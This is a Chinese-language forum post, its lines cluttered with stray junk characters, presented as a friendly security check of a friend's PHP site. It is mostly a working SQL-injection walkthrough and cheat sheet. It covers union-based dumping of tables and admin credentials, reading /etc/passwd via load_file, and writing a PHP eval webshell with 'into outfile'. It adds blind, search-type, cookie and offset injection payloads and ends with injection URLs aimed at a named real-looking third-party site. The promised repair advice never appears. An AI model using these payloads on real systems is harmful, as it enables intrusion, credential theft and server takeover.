我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~% X, a/ Q* s4 |+ A. t% m: S0 h
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
5 k7 R# ?5 M- W6 F" |我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。: K5 n1 j: s) |. r3 Q8 b
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)9 ]% P) `2 e) ^; U/ @
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
) k6 q! R" B: f. E/ C& ?0 v这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
7 ?9 w# L1 V9 m' k# Q- n; N# XWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in9 l( v) Z+ K" x4 c+ u) ?
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入* P) L# y/ \8 f( |
# D( C9 D; E' @1 p, ~
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
* I# e5 O5 g1 C+ z+ A' \- S2 l3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
9 b( X- ~! ^, b6 E0 ^4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息/ g9 y; X* `8 F. W# S' D8 Z
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。: o9 f9 B* f$ k' v3 Z
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
" K* `# }4 J- L$ G1 j6 \" h/ r1 T2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。5 h5 h1 @, [9 B6 t" y. P d* ?
我就用的是第二个思路,
7 R; Y7 v U' y8 e% ?# K提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1--
: S# n2 \/ j1 X' u/ M% l6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,3 V2 e8 [3 T* E0 D' B: F6 u' e( D
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
6 K; K' H: t8 n B! c! p注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
% S6 Q- ~) ~+ B( [4 Q7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????4 N3 n! F8 G6 a- P1 w' m0 ]
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
. \7 S: v! S8 u* E; @4 k提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
9 K7 A# q, i V9 p然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,9 u* T! i- M9 N- Z4 W3 g/ f5 J( v
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
3 @0 _! C# w* @6 z1 ^下面是一些很普遍注入方式资料:
# X1 y, n$ g, I+ k% D( a; d注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=', x6 g7 K: b$ B$ X+ F
拆半法
$ M( l Z8 n1 {% I+ h2 [######################################0 i8 I4 m- n' ^1 T8 P. H
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。) O, b3 u% ?: f* G6 X& u1 v! W
and exists (select * from admin)' L1 w2 k8 ]' I$ a/ i
and exists(select id from admin)
3 D* m1 y' B. }" m2 sand exists(select id from admin where id=1)
0 A( f7 u! K$ y% i3 a2 K6 Gand exists(select id from admin where id>1) W# u. M# P6 v0 t k
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 ( m: x1 p$ x4 I
and exists (select username from admin)/ t" z! V( Y J5 \
and exists (select password from admin)
% P& P8 U$ b. L# aand exists (select id from admin where len(username)<10 and id=1)
3 r/ ]1 N- E1 gand exists (select id from admin where len(username)>5 and id=1)
9 M- h0 X/ j1 Q/ @' Y i% V5 Iand exists (select id from admin where len(username)=6 and id=1)
' D- b! f6 c2 d9 @& n3 I8 xand exists (select id from admin where len(password)<10 and id=1)
4 h! o8 K2 j$ B8 P$ Y' M' z; J! wand exists (select id from admin where len(password)>5 and id=1)
. l0 c# B4 e3 Cand exists (select id from admin where len(password)=7 and id=1): P6 l& x* d! @/ L7 Z; \( e4 [ O
and (select top 1 asc(mid(username,1,1)) from admin)=97
' D/ N, `( v& i返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。; j* t1 S4 b/ r" X8 o6 N; Q _: m
猜第二位把username,1,1改成username,2,1就可以了。 v% u ]/ O. }
猜密码把username改成password就OK了
; [: C0 q3 J' \##################################################3 j7 x1 g+ _8 c9 i8 S
搜索型注入: V# m& e+ U0 ?, ?$ ~- |: ~
##################################
+ `, e! I* l5 u' ^ \: y%' and 1=1 and '%'='
, w5 d' e R2 _( @ n# d%' and exists (select * from admin) and '%'='8 D- W( O# Q" K
%' and exists(select id from admin where id=1) and '%'='% N: Z/ s u# \+ g: j
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
$ v8 q; O; X! @3 A5 \: }4 A, N%' and exists (select id from admin where len(password)=7 and id=1) and '%'='6 b' u9 A, a8 G- P/ i) N% d
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='; l# F2 T. x6 b4 P
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
" F/ z& p) P8 N; _对于MSSQL数据库,后面可以吧 and '%'='换成--
L) ? d9 k+ H9 ?2 D! R还有一点搜索型注入也可以使用union语句。
, i0 D3 O* t9 k7 x########################################################( A! e4 D' Q, l5 {" W
联合查询。4 ^1 m( F2 ^, A' H* P
#####################################
6 V' o8 n w7 \order by 10: F" q2 n9 v6 ~5 G7 b. y, ~2 w
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
5 P% S( f0 S) t& H1 ~9 n C3 \5 x2 x2 ^and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
7 O# d# `' E5 Aand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1# x0 j! K5 V* i2 ^ o. p
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
! R$ C/ L2 P1 n2 v8 j( J2 {5 M#################################### C1 d: w6 h8 h
cookie注入
$ Q! i3 S' U# D0 R4 W# u###############################. x4 X5 p J: K
http://www.******.com/shownews.asp?id=127
) |" I; ^# \8 Q. Y0 [http://www.******.com/shownews.asp
+ M( B' ~% J1 j! m: c8 Xalert(="id="+escape("127"));3 ?; t5 z& w) Z. Q1 o' z2 e5 e- Q
alert(="id="+escape("127 and 1=1"));
) F9 E* F1 ^$ X: u' O: _alert(="id="+escape("127 order by 10"));4 t8 K( ^, p% ^" E* \$ W% I
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));6 L2 F1 t r; @8 r2 X
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
" _9 @- x1 `+ y5 ]0 b这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
$ X! T, Z: |. p# m###################################
! d* S% p5 }0 \6 p. h8 Q8 C: j5 I偏移注入
) [8 d% ]; W6 b; q###########################################################; w9 a) ]. }/ N' v4 ~
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin. O/ ?6 X9 S4 [% y; z2 {
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin: a* r+ y, ] }6 F
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)* N8 [8 t7 l8 ^. t: g l
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)% v2 B D/ K q! K6 Q
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)0 @1 Q7 v2 F- g4 U" y: Y S
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)& ^* _1 M6 ?6 U) M
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
" m8 @6 M7 m- M4 Ha.id=d.id)
& g8 A1 r& J+ _2 w# U2 kand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
8 [& [8 _! I' K3 Mand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
1 G0 J4 n. W( E* ^ + X7 d# D& q( V0 [8 }. u
============================================================================================================% u+ G( u Q/ i9 ^
1.判断版本
8 M' ^" K2 X' O! c$ Sand ord(mid(version(),1,1))>51
$ N' L$ }8 H% O/ }& v( E- u4 O. _0 r返回正常,说明大于4.0版本,支持ounion查询2 m: c) ]9 o2 v$ E1 G" G
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解, w1 h' P! [5 F$ D! f5 B8 l: b/ f
and 2=4 union select 1,2,3,4,5,6,7,8,9--, S0 Z6 H7 \! v3 Y
3.查看数据库版本及当前用户,% w* Z* c/ M, y. R/ F
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
: ?- p& t, @, o, ], G数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,: ?+ X4 m& [2 Y* e6 j$ o8 t x% I
4.判断有没有写权限
7 R. H3 s- I2 R* L: j+ J0 aand (select count(*) from MySQL.user)>0--
2 k$ |# z/ z4 P5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1: m1 K' b; i2 D6 b! s
用不了这个命令,就学习土耳其黑客手法,如下
0 \) S( v) V- X4 qand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--4 }! Q! |' o" o/ ~
6.爆表,爆库2 I6 z- `4 g7 u' V
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--) R. D9 x! ]- {" K+ e
7.爆列名,爆表
; q5 F# b$ y' H/ @and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--/ @/ `! N- k6 y- S9 p# J/ ~8 @
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
& x2 b; M& M" W4 Z% g5 w4 oand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--2 B+ s, q7 Z q% a2 z0 Q! Z7 S9 ^3 v
9.爆字段内容
' B3 A- s3 E) [and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
) P& y, G: e* J$ j' ]! vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |